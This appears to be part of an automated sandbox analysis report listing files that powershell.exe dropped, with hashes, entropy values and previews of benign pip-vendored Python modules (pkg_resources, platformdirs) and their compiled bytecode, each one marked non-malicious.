                              Preview:""".Package resource API.--------------------..A resource is a logical file contained within a package, or a logical.subdirectory thereof. The package resource API expects resource names.to have their path parts separated with ``/``, *not* whatever the local.path separator is. Do not use os.path operations to manipulate resource.names being passed into the API...The package resource API is designed to work with normal filesystem packages,..egg files, and unpacked .egg files. It can also work in a limited way with..zip files and with custom PEP 302 loaders that support the ``get_data()``.method...This module is deprecated. Users are directed to :mod:`importlib.resources`,.:mod:`importlib.metadata` and :pypi:`packaging` instead.."""..import sys.import os.import io.import time.import re.import types.import zipfile.import zipimport.import warnings.import stat.import functools.import pkgutil.import operator.import platform.import collections.import plistlib.import email.parser.import err
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):146484
                              Entropy (8bit):5.256399314142677
                              Encrypted:false
                              SSDEEP:1536:AMAonYMjUciID6g5uLAnc/gKPMyhxlumT3EklRq9OVr9cXpOPZg5K:ZAbeUcXOVEnWgKEyhxh3TlhgOe5K
                              MD5:854F04C073CD4F229F0EABAD78B97074
                              SHA1:5B76F1530C1546BE4FB9A98CC01FBC9E499D38B0
                              SHA-256:234C02AA7C38F473CE9AD7FF824475AE3EC1AAE59E11F7D55E10BF1DD7539FAC
                              SHA-512:B37E9D11BAA777C5F957E8F1475418BB77FF66079B15F3C60616508D9CB0A8F568591C82CC38F2B16E269E07EB89B5E2551601355B733C8FDE8DF15EFFAB3AAF
                              Malicious:false
                              Preview:........=.Cf4.........................`.....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.....d.d.l.Z...e...d.d.l.m!Z!....d.d.l.m"Z"m#Z#m$Z$..d.Z%d.d.l.m&Z'..d.d.l(m)Z)m*Z*....d.d.l+m,Z-..e-j\....................d.d.l/m0Z0m1Z1m2Z2..d.d.l3m4Z4..d.d.l3m5Z5....e6d.............e6d.............e6d.............e6d.............e6d...........e.jn..................d.k...r...e8d...........d.Z9d.Z:d.Z;d.Z<d.Z=d.Z>d.Z?d.Z@d.ZAd.ZBd.ZCd.ZDd.ZEd.ZFd.ZGd.ZHd.ZI..e.j...................d.eKd...............e.j...................d.e.j...........................ZN..G.d...d.eO........ZPe5j...................j...................ZSi.ZTd...ZUd...ZVd...ZWd...ZXd...ZYd...ZZd ..Z[d!..x.Z\Z]d"..Z^g.d#..Z_..G.d$..d%e`........Za..G.d&..d'ea........Zb..G.d(..d)eb........Zc..G.d*..d+ea........Zd..G.d,..d-ea........Zei.Zf..d.j...................e.jn............
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):20155
                              Entropy (8bit):4.749223981187306
                              Encrypted:false
                              SSDEEP:384:+PZO9oOLdVfVbOcVnDZV2OTF2AOjHiu5BW5fspOhZS5waF5hb6705EmTFs:+PgDqFT5s
                              MD5:2549E67EDC5D9515995B0579E16E00CF
                              SHA1:A608AFE522FC4FEFB694A31E2AB121526E2F864A
                              SHA-256:4A4844615C82FC75070BA297EE7E0CFFA728C9132D101DFC40CC8E608017E989
                              SHA-512:EB2A405AF6E9FC31537D4EF8927ACFF6745F517A95BA3E2C8DE3F5AE58EF8FBFF880A3B28ED51F4A0E2F4D85E6F030982CF91C8808F700CF75AC2D320AE87F04
                              Malicious:false
                              Preview:""".Utilities for determining application-specific dirs. See <https://github.com/platformdirs/platformdirs> for details and.usage..""".from __future__ import annotations..import os.import sys.from typing import TYPE_CHECKING..from .api import PlatformDirsABC.from .version import __version__.from .version import __version_tuple__ as __version_info__..if TYPE_CHECKING:. from pathlib import Path.. if sys.version_info >= (3, 8): # pragma: no cover (py38+). from typing import Literal. else: # pragma: no cover (py38+). from pip._vendor.typing_extensions import Literal...def _set_platform_dir_class() -> type[PlatformDirsABC]:. if sys.platform == "win32":. from pip._vendor.platformdirs.windows import Windows as Result. elif sys.platform == "darwin":. from pip._vendor.platformdirs.macos import MacOS as Result. else:. from pip._vendor.platformdirs.unix import Unix as Result.. if os.getenv("ANDROID_DATA") == "/data" and os.getenv("ANDROID_
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):1476
                              Entropy (8bit):4.724060252133051
                              Encrypted:false
                              SSDEEP:24:mFd8dDXoPPzFm2Hpm4fX5syOrheytw/1uZMeheyo/1uZMeQyKS/1uZMJY4yb/1u+:mgdDXoPPzE2Hpm4fX5qhY/wiehS/wieW
                              MD5:845D1D5F5662F331494544E6C660FCCC
                              SHA1:94FF1A360C3481CDACD76582FC7BD9AA36C4A4C5
                              SHA-256:7D5BD2893CEBDBE44CE88B235A38F87E468EB433A00E1516BFAB00F7D768E024
                              SHA-512:B2C6E49B0DCCF1BFA8BD938D9737FE92D5E67A7F3C3556E17B4B0500EB787E8F47021F2777E5EE6430B7E0B8A0B7D1B695C9E29987E3BB657DF2FD3BA1C9E456
                              Malicious:false
                              Preview:"""Main entry point.""".from __future__ import annotations..from pip._vendor.platformdirs import PlatformDirs, __version__..PROPS = (. "user_data_dir",. "user_config_dir",. "user_cache_dir",. "user_state_dir",. "user_log_dir",. "user_documents_dir",. "user_downloads_dir",. "user_pictures_dir",. "user_videos_dir",. "user_music_dir",. "user_runtime_dir",. "site_data_dir",. "site_config_dir",. "site_cache_dir",.)...def main() -> None:. """Run main entry point.""". app_name = "MyApp". app_author = "MyCompany".. print(f"-- platformdirs {__version__} --") # noqa: T201.. print("-- app dirs (with optional 'version')") # noqa: T201. dirs = PlatformDirs(app_name, app_author, version="1.0"). for prop in PROPS:. print(f"{prop}: {getattr(dirs, prop)}") # noqa: T201.. print("\n-- app dirs (without optional 'version')") # noqa: T201. dirs = PlatformDirs(app_name, app_author). for prop in PROPS:. print(f"{prop}:
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):18039
                              Entropy (8bit):5.3424530727674355
                              Encrypted:false
                              SSDEEP:384:TcROCDJOOXiDOTbRdzOyLOjjdfPrOho32EqP3lRs4so4gFQed43C:TcJR6eDYY9d43C
                              MD5:AE600ABF9029A1FE27953AEA3A8E2E12
                              SHA1:F42472FBA7EA92DE30BB8AC1394C6A07B93AF925
                              SHA-256:D53D7D47DC100B4BFEEBA873F871C0E2D030AF9C53AA4E4C19D8922FC2B5B251
                              SHA-512:AE8DBD8A5C2873403655D3F04B1EBF06E707CA1BC10E26AF6167D82747561C9D596E3C3B5F47B4405F6783292A99FE89AB3823FF070533A2527475E1D2863259
                              Malicious:false
                              Preview:........=.Cf.N..............................d.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.r"d.d.l.m.Z...e.j...................d.k\..r.d.d.l.m.Z...n.d.d.l.m.Z...d*d...Z...e.........Z.e.Z...........d+......................d,d...Z...........d+......................d-d...Z...........d+......................d,d...Z...........d+......................d-d...Z...........d.......................d/d...Z...........d.......................d/d...Z...........d+......................d,d...Z...........d.......................d/d...Z.d0d...Z.d0d...Z.d0d...Z.d0d...Z d0d...Z!..........d.......................d/d...Z"..........d+......................d1d...Z#..........d+......................d2d...Z$..........d+......................d1d...Z%..........d+......................d2d...Z&..........d.......................d3d...Z'..........d.......................d3d ..Z(..........d+......................d1d!..Z)..........d.......................d3d"..Z*d4d#..Z+d4d$..Z,d4d%..Z-
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):1956
                              Entropy (8bit):5.511021450916794
                              Encrypted:false
                              SSDEEP:48:WpuRGZVPugbKLzb8KY+fZSsjWYBDvX5X7q:otZVPdbKnb8XjAA
                              MD5:5A836084C65E4077FE144638DBDCC830
                              SHA1:41A123C88FF91E5EA4CAF64204C7AFDDDE308733
                              SHA-256:95A5C47C49538C64F475024975FBFBB285A384BA934352FA5B5072E0863296AD
                              SHA-512:52AC31DA26335D9105DBFDACCCFDD543FE4BF771C40932CCD45079C1F08C6790FA1F08AD32E1B2AFE2E2FABFD5979F728AF1358DB75509AB23A885E9A156A9BB
                              Malicious:false
                              Preview:........=.Cf..........................J.....d.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.Z.d.d...Z.e.d.k(..r...e...........y.y.).z.Main entry point......)...annotations)...PlatformDirs..__version__)...user_data_dir..user_config_dir..user_cache_dir..user_state_dir..user_log_dir..user_documents_dir..user_downloads_dir..user_pictures_dir..user_videos_dir..user_music_dir..user_runtime_dir..site_data_dir..site_config_dir..site_cache_dirc...........................d.}.d.}.t.........d.t...........d.............t.........d...........t.........|.|.d...........}.t.........D.]...}.t.........|...d.t.........|.|...........................t.........d...........t.........|.|.........}.t.........D.]...}.t.........|...d.t.........|.|...........................t.........d...........t.........|.........}.t.........D.]...}.t.........|...d.t.........|.|...........................t.........d...........t.........|.d...........}.t.........D.]...}.t.........|...d.t.........|.|...........................y.).z.Run main ent
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):9454
                              Entropy (8bit):5.249961242602825
                              Encrypted:false
                              SSDEEP:192:ek/yKfyqItKHYfBSlfSUgHWTKW6pOK3MmaJ9ZTQs:ek/Zfyq9xls2GW6pl3MjJXT/
                              MD5:6A9F9FDB0AE30CFEB7090E53B928E0F7
                              SHA1:A8AD5C902DB934D930C70A4F67597E939F584F2F
                              SHA-256:97120A076C82A70989DF5F1F5E774BAC9EE93E43E08B6CCB92E33B10ABB90E9B
                              SHA-512:8E0818DC7E6E4A52C28A8BBD2FEF44828F214022A99914AABD0D5BEBB46DAE2612D21FBE26B7AEACD26EE9BEA02742B70AEC84FA0961660EFE7F0CBE7512E624
                              Malicious:false
                              Preview:........=.Cf+.........................,.....d.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....G.d...d.e.........Z...e.d...........d.d...........Z...e.d...........d.d...........Z...e.d...........d.d...........Z...e.d...........d.d...........Z...e.d...........d.d...........Z...e.d...........d.d...........Z.d.g.Z.y.).z.Android......)...annotationsN)...lru_cache)...cast.....)...PlatformDirsABCc...........................e.Z.d.Z.d.Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.y.)...Androida$.... Follows the guidance `from here <https://android.stackexchange.com/a/216132>`_. Makes use of the. `appname <platformdirs.api.PlatformDirsABC.appname>`,. `version <platformdirs.api.PlatformDirsABC.version>`,. `ensure_exists <platformdirs.api.PlatformDirsABC
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):9682
                              Entropy (8bit):5.050705521055384
                              Encrypted:false
                              SSDEEP:192:pWGnDdCIGjpgRhUWqEpUBo9B6++mj8dvHxLfcSWAhzg:p9nDdlKoAk8xHxRjzg
                              MD5:B5A657CE1DA93DCED87B801223FE2EEC
                              SHA1:ACDA1F9AF16CD82F85BE3FC3E8A399F07B20820E
                              SHA-256:774B2FCB27D1C683607B72E8AC0200FA4AD652C703A56160382BD457116F2C0F
                              SHA-512:55394C440F16508E03D59BC29900674982559C345343370C5DDFC9B2E0C073BA48A402B735AB9E308B151E22A6D0AAB089973590AAB8F2457D2AEC4E10F1DF73
                              Malicious:false
                              Preview:........=.Cf...............................d.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.r d.d.l.Z.e.j...................d.k\..r.d.d.l.m.Z...n.d.d.l.m.Z.....G.d...d.e.........Z.y.).z.Base API......)...annotationsN)...ABC..abstractmethod)...Path)...TYPE_CHECKING)...........)...Literalc...........................e.Z.d.Z.d.Z...............d"..............................d#d...Z.d$d...Z.d%d...Z.e.e.d&d...................Z.e.e.d&d...................Z.e.e.d&d...................Z.e.e.d&d...................Z.e.e.d&d...................Z.e.e.d&d...................Z.e.e.d&d...................Z.e.e.d&d...................Z.e.e.d&d...................Z.e.e.d&d...................Z.e.e.d&d...................Z.e.e.d&d...................Z.e.e.d&d...................Z.e.e.d&d...................Z.e.d'd...........Z.e.d'd...........Z.e.d'd...........Z.e.d'd...........Z.e.d'd...........Z.e.d'd...........Z.e.d'd...........Z.e.d'd...........Z.e.d'd...........Z.e.d'd...........Z e.d'd........
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):5647
                              Entropy (8bit):5.120076615370562
                              Encrypted:false
                              SSDEEP:96:jp7FCcbHzE9nmnUGNI2ngsOUHIJtvv3KnRc:FxCcbHzE1GN0sOqIfb
                              MD5:7DA60BB3246A70CCC7C2904EBA91100A
                              SHA1:782B4DA74A6A112C560C16AE2147129892C0A3CD
                              SHA-256:96CE3696655AE21F335542D8E35566A622774E0E4F192D345607A3E49CE0D038
                              SHA-512:A15E8603C567908E625D216D7D8820B9E54E730BA94AEB416D0D0B8B81CC88366381F8ECF4D5E3EF49005495B6E0B3674F6B937EF5A93C393225D89F6FA27D73
                              Malicious:false
                              Preview:........=.Cf^.........................D.....d.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z.....G.d...d.e.........Z.d.g.Z.y.).z.macOS......)...annotationsN.....)...PlatformDirsABCc...........................e.Z.d.Z.d.Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.y.)...MacOSa..... Platform directories for the macOS operating system. Follows the guidance from `Apple documentation. <https://developer.apple.com/library/archive/documentation/FileManagement/Conceptual/FileSystemProgrammingGuide/MacOSXDirectories/MacOSXDirectories.html>`_.. Makes use of the `appname <platformdirs.api.PlatformDirsABC.appname>`,. `version <platformdirs.api.PlatformDirsABC.version>`,. `ensure_exists <platformdirs.api.PlatformDirsABC.ensure_exists>`.. c.....................^.....|.j...................t...
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):12451
                              Entropy (8bit):5.281769364699578
                              Encrypted:false
                              SSDEEP:192:qYn+H5wHxeffr8/EmlCIY3gqZbDvyKdXpYJ:1+HQx0z8/EnIYQeHvXdXpYJ
                              MD5:2576EF6D502793C3B16ED6A0A03CA148
                              SHA1:944561E720599216DA3612BF7C64FC16B97A28B6
                              SHA-256:2155F11A232098E712A28F98FBB159A8BD8886893066D37BE22C849363CE5324
                              SHA-512:05BEA454121A6A111920E941DD277A0FE0D9F069F9F581499C81DC29CC8B88DDCE63389A75CD70ABA5F10DE058CC01916E5369108BCF00CD215FACCB22E93052
                              Malicious:false
                              Preview:........=.Cfi".............................d.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.j...................d.k(..r.d.d...Z.n.d.d.l.m.Z.....G.d...d.e.........Z.d.d...Z.d.d...Z.d.g.Z.y.).z.Unix......)...annotationsN)...ConfigParser)...Path.....)...PlatformDirsABC..win32c...........................d.}.t.........|...........).Nz.should only be used on Unix)...RuntimeError)...msgs.... .iC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_vendor/platformdirs/unix.py..getuidr........s........+......3...........).r....c.....................R.....e.Z.d.Z.d.Z.e.d.d...........Z.e.d.d...........Z.d.d...Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.d.d...Z.y.)...Unixa..... On Unix/Linux, we follow the. `XDG Basedir Spe
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):321
                              Entropy (8bit):5.361286921298423
                              Encrypted:false
                              SSDEEP:6:r/0OsSITnIflyrtW3D6WNAQ9ACqn23d6oAreasGH5aylehK6Z+vYq:AOSIf4GmWJjImafH5aylehK6wZ
                              MD5:74CAB6405DE12C05DAF374E4EB4BC96F
                              SHA1:CB7CA231BD1318CCB0CFB6F63A95F5C05DC3B952
                              SHA-256:04F968C91A3C8FDB62DC7B76DD592BB36F68EC2C0DDD1B95926310397C7BA50F
                              SHA-512:EF01B39829FFFC69AA666FDB0507D2BB8C692529E0A012DC2FB527BD82BB9CCF5B3D87A7F3E884C465AD1829B4EE6883D8EBEE4F5308B7699CC677F35717C28C
                              Malicious:false
                              Preview:........=.Cf................................d.x.Z.Z.d.x.Z.Z.y.).z.3.8.1)................N)...__version__..version..__version_tuple__..version_tuple........lC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_vendor/platformdirs/version.py..<module>r........s............. ......g.$-..-....Mr....
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):13009
                              Entropy (8bit):5.239625721967246
                              Encrypted:false
                              SSDEEP:192:SEcdwBXxIgB+DuMofny+hU85erYOaqsgcXk:SEcdwBXxIlDEPygUUerFvSk
                              MD5:6EA14FD49DDB323A3D6FE9F881B3A9E2
                              SHA1:EABCF0DB15885FCF4F881C3B07A847AB0F35A2A6
                              SHA-256:23D2C773D85B13D245451C0401B75FC0C59C7E764BDA70B660F520C628F97618
                              SHA-512:8CA5B62768B33C69DDBF2C5665D616BB57B6B95A7D2883A538E8DB52D260E3DD548CD1FD156483E95D8E84EABBBDC94E72F3F046D99C690310B2224DD6B1F99C
                              Malicious:false
                              Preview:........=.Cfe%..............................d.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.r.d.d.l.m.Z.....G.d...d.e.........Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.....e.d.............e.................Z.d.g.Z.y.).z.Windows......)...annotationsN)...lru_cache)...TYPE_CHECKING.....)...PlatformDirsABC)...Callablec...........................e.Z.d.Z.d.Z.e.d.d...........Z.d.d...d.d...Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.y.)...Windowsa..... `MSDN on where to store app data files. <http://support.microsoft.com/default.aspx?scid=kb;en-us;310294#XSLTH3194121123120121120120>`_.. Makes use of the. `appname <platformdirs.api.PlatformDirsABC.appname>`,. `appauthor <platformdirs.api.PlatformDirsABC.appauthor>`,. `version <platformdirs.api.PlatformDirsABC
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):7211
                              Entropy (8bit):4.742765976902356
                              Encrypted:false
                              SSDEEP:192:IGoI72STvJKTm3tKy1rdnDTgFPYOiPOVKiI//Kgd20HPhC:IG5ETmIyZ9UwlPOgfC/
                              MD5:B88ED255CD7DFB30CB3B29AC5DB896B3
                              SHA1:AFFD713179820AA4E5A202972DCF104BE2C978C2
                              SHA-256:CBF10430AC18976F9BCD8043A2F92C4A7F26EFAA27D0B75AF1EC8992C55013D5
                              SHA-512:26EBD3A543B1A7CC9DA502D5F3D8DAB0CAC0385C53F31F3DC254D0105BD6148C2A3A68B914400DF6974CB803B140EF95E6793E8B20EAD3752C8ADCBA664A372D
                              Malicious:false
                              Preview:"""Android.""".from __future__ import annotations..import os.import re.import sys.from functools import lru_cache.from typing import cast..from .api import PlatformDirsABC...class Android(PlatformDirsABC):. """. Follows the guidance `from here <https://android.stackexchange.com/a/216132>`_. Makes use of the. `appname <platformdirs.api.PlatformDirsABC.appname>`,. `version <platformdirs.api.PlatformDirsABC.version>`,. `ensure_exists <platformdirs.api.PlatformDirsABC.ensure_exists>`.. """.. @property. def user_data_dir(self) -> str:. """:return: data directory tied to the user, e.g. ``/data/user/<userid>/<packagename>/files/<AppName>``""". return self._append_app_name_and_version(cast(str, _android_folder()), "files").. @property. def site_data_dir(self) -> str:. """:return: data directory shared by users, same as `user_data_dir`""". return self.user_data_dir.. @property. def user_config_dir(self) -> str:. """.
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):7132
                              Entropy (8bit):4.492814423682991
                              Encrypted:false
                              SSDEEP:192:9uSGliZEBgZNvVpRnjhGIFE+aswgvZ6Z/n1Fg/cw:9uSkcu+T/Z0w
                              MD5:CD9DAA2FBC97E78B4F2CCCA85EEE331C
                              SHA1:29FA6EB99DF6529E731EFB845F2D968858EBB392
                              SHA-256:8D6B57D3A8C0272B58AE42433AA125B3DEE60A4C87452664A2A5256CC2B941EC
                              SHA-512:07705C4A7B4A0981323851307C6D84A1E0ABD357D71E303BB515BF4861EFC017966DBDC225B7E1836E6BD6A7A68956CBB318DF48A6883E3744F5470245996832
                              Malicious:false
                              Preview:"""Base API.""".from __future__ import annotations..import os.from abc import ABC, abstractmethod.from pathlib import Path.from typing import TYPE_CHECKING..if TYPE_CHECKING:. import sys.. if sys.version_info >= (3, 8): # pragma: no cover (py38+). from typing import Literal. else: # pragma: no cover (py38+). from pip._vendor.typing_extensions import Literal...class PlatformDirsABC(ABC):. """Abstract base class for platform directories.""".. def __init__( # noqa: PLR0913. self,. appname: str | None = None,. appauthor: str | None | Literal[False] = None,. version: str | None = None,. roaming: bool = False, # noqa: FBT001, FBT002. multipath: bool = False, # noqa: FBT001, FBT002. opinion: bool = True, # noqa: FBT001, FBT002. ensure_exists: bool = False, # noqa: FBT001, FBT002. ) -> None:. """. Create a new platform directory... :param appname: See `appname`.. :param ap
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):3678
                              Entropy (8bit):4.801640765455566
                              Encrypted:false
                              SSDEEP:48:OO97j3xWbKAyK4GbCnXlhSgtTeyDAHy+fRIW4oyviDiauyl9KapyT8aOwyoAsnaH:n7FojwNDMSnZvSfffMJORnRwZi5f
                              MD5:9668A7BB908E9053E7A226EC2002E273
                              SHA1:882A251FB3C3B34A19CC3FD6C2C0890C8A16F68E
                              SHA-256:2EE7953A85601960C1C106FC385C1791529F567DF708CD4B9307F5F80F3AB514
                              SHA-512:2217BE44BB1DE54F040DE9A21EA34C2C0349781283E0C029EAF3F513E6E2104C3FC63C0924C004F89124F4F3E7BA2DA38CD490388A7DE11BA48CB63FF37B8CC4
                              Malicious:false
                              Preview:"""macOS.""".from __future__ import annotations..import os.path..from .api import PlatformDirsABC...class MacOS(PlatformDirsABC):. """. Platform directories for the macOS operating system. Follows the guidance from `Apple documentation. <https://developer.apple.com/library/archive/documentation/FileManagement/Conceptual/FileSystemProgrammingGuide/MacOSXDirectories/MacOSXDirectories.html>`_.. Makes use of the `appname <platformdirs.api.PlatformDirsABC.appname>`,. `version <platformdirs.api.PlatformDirsABC.version>`,. `ensure_exists <platformdirs.api.PlatformDirsABC.ensure_exists>`.. """.. @property. def user_data_dir(self) -> str:. """:return: data directory tied to the user, e.g. ``~/Library/Application Support/$appname/$version``""". return self._append_app_name_and_version(os.path.expanduser("~/Library/Application Support")) # noqa: PTH111.. @property. def site_data_dir(self) -> str:. """:return: data directory shared by users, e
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):8809
                              Entropy (8bit):4.794758253446687
                              Encrypted:false
                              SSDEEP:192:Vlp+wzUwWDKm07bHnAutWeWvSSBSQYjnTboj2Yl+rzuhRGkML+J:VeOygESS8BncSYl+G5J
                              MD5:79CDF1C44638AE984A2970F326A72109
                              SHA1:1277760E5B8E451F64EBF06FF97C74398EE2E082
                              SHA-256:DB626147C658D1A2F14950859CAADCE9FD62CFA1AFE362B6E036A3EDA4E37D28
                              SHA-512:0A7ED73FCEA6ECD6509F006500EA3E4290526BF9F3C4D86F142E6C0B1FC2F5068FEC40AC93995932FCD80E63DA22F6D17A9BBBC0BDB744D930DB51B6A211207E
                              Malicious:false
                              Preview:"""Unix.""".from __future__ import annotations..import os.import sys.from configparser import ConfigParser.from pathlib import Path..from .api import PlatformDirsABC..if sys.platform == "win32":.. def getuid() -> int:. msg = "should only be used on Unix". raise RuntimeError(msg)..else:. from os import getuid...class Unix(PlatformDirsABC):. """. On Unix/Linux, we follow the. `XDG Basedir Spec <https://specifications.freedesktop.org/basedir-spec/basedir-spec-latest.html>`_. The spec allows. overriding directories with environment variables. The examples show are the default values, alongside the name of. the environment variable that overrides them. Makes use of the. `appname <platformdirs.api.PlatformDirsABC.appname>`,. `version <platformdirs.api.PlatformDirsABC.version>`,. `multipath <platformdirs.api.PlatformDirsABC.multipath>`,. `opinion <platformdirs.api.PlatformDirsABC.opinion>`,. `ensure_exists <platformdirs.api.PlatformDirsABC.ens
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text
                              Category:dropped
                              Size (bytes):160
                              Entropy (8bit):4.561427135160526
                              Encrypted:false
                              SSDEEP:3:Scb9cFWARQ7RYZG7zGN6zRXv3VyLQdLxZvBL4AbJAQnAj3qdJz:Scb+sARQ7CG7qN6iQdNpBRdAQnAGdh
                              MD5:600718EEF039BB1F40A5CDB508DC6C81
                              SHA1:758CF01A74194429A53AC797732AA6EA741ECB00
                              SHA-256:99ABD94D02092177DD7B011A4939FB116ACD7CF656791A1F6FEEF8C6A5B97F63
                              SHA-512:5BF4BD02594724A0C25C16CDECE84943692954E69B75BD042E35B0E48BDE503B16D75BCDEA58EE3B635AB235EC3EC4D6AC92FA0A1FD7586EA0E11A7493D4F650
                              Malicious:false
                              Preview:# file generated by setuptools_scm.# don't change, don't track in version control.__version__ = version = '3.8.1'.__version_tuple__ = version_tuple = (3, 8, 1).
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):9573
                              Entropy (8bit):5.075076832425199
                              Encrypted:false
                              SSDEEP:192:Dz5c0mNQSrvSYAnxq5p9cdNHpDP18y3r8kFfFc:f5c31+n26lfc
                              MD5:1B10C536F6870973A7FC134015A9E844
                              SHA1:4CA3A38027B37588FB1B16C3833B3D5E5581CFE5
                              SHA-256:E13B5B3C6A161B63D1808D75BAAB836BB79193C4DCC6F9D436EB8C19922D9D77
                              SHA-512:3A0A0DFA9F3292F2F653AB81D533C70825CD29ABF95B27266D2898D406670B0CF085BD2E35AD57A678F8F45AF59CFE5873FEF62FC7A1462D0750C6F1A57F9D86
                              Malicious:false
                              Preview:"""Windows.""".from __future__ import annotations..import ctypes.import os.import sys.from functools import lru_cache.from typing import TYPE_CHECKING..from .api import PlatformDirsABC..if TYPE_CHECKING:. from collections.abc import Callable...class Windows(PlatformDirsABC):. """. `MSDN on where to store app data files. <http://support.microsoft.com/default.aspx?scid=kb;en-us;310294#XSLTH3194121123120121120120>`_.. Makes use of the. `appname <platformdirs.api.PlatformDirsABC.appname>`,. `appauthor <platformdirs.api.PlatformDirsABC.appauthor>`,. `version <platformdirs.api.PlatformDirsABC.version>`,. `roaming <platformdirs.api.PlatformDirsABC.roaming>`,. `opinion <platformdirs.api.PlatformDirsABC.opinion>`,. `ensure_exists <platformdirs.api.PlatformDirsABC.ensure_exists>`.. """.. @property. def user_data_dir(self) -> str:. """. :return: data directory tied to the user, e.g.. ``%USERPROFILE%\\AppData\\Local\\$appauthor\\$appn
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):2983
                              Entropy (8bit):4.615037148370751
                              Encrypted:false
                              SSDEEP:48:4H4DMeNykEe7yMQTleKpKSGErxGpYWiywW6UiGkNyWkggGoHtLj1sfywL2niXGkM:4H4DtykEe7HswKpKSziYx9/NvUNtsFyp
                              MD5:CDD01A44CB801A2AF69D0D75DB8D1E13
                              SHA1:9B2DBD30889307DDA6766E27E21D9E5BE91E0801
                              SHA-256:E80B8396342DBDFF3D0D3354C9633B937A1494FFE5ABBD0D53E20D28AB5E3816
                              SHA-512:5A5461FC5B40A9931F8CD9893EDA2F6F09FCBDD79E555CD07D8E38729299776C60922BA8A877B5BD927B36BDE9D5C5CF17769F51F105D9A83F38747C3AE8AD31
                              Malicious:false
